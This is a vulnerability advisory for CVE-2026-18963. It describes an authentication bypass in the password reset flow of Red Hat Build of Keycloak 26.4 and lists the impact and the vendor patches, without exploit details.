CVE-2026-18963
Overview
This vulnerability is an authentication bypass in the reset-credentials flow of the keycloak-services component within Red Hat Build of Keycloak 26.4. The root cause lies in the failure to enforce the mandatory email verification step during password reset, allowing the reset process to be completed without user interaction. The affected component is the identity and access management core engine responsible for handling credential resets.
Vulnerability Description
A flaw was found in the reset-credentials flow of the keycloak-services component, which is the core engine for identity and access management in Red Hat Build of Keycloak. The issue allows an unauthenticated attacker to force the password reset process for any user without needing to click the required email verification link. This can result in the attacker gaining full control over target user accounts by directly setting new credentials.
Impact
An attacker without any authentication or user interaction can forcibly reset passwords of arbitrary user accounts, gaining full control over those accounts. This enables unauthorized access to sensitive user data and potentially escalates privileges within the affected system. The compromise of user accounts can lead to data breaches, unauthorized actions, and disruption of identity and access management processes within organizations using this Keycloak build.
Solution
Apply updates as specified in Red Hat advisories RHSA-2026:56519, RHSA-2026:56520, RHSA-2026:56523, and RHSA-2026:56524 for Red Hat Build of Keycloak 26.4. These advisories contain patches that address the reset-credentials flow vulnerability by enforcing proper verification steps. Refer to the vendor advisories at https://access.redhat.com/errata/ for detailed patching instructions and ensure deployment of the latest fixed versions to mitigate the issue.
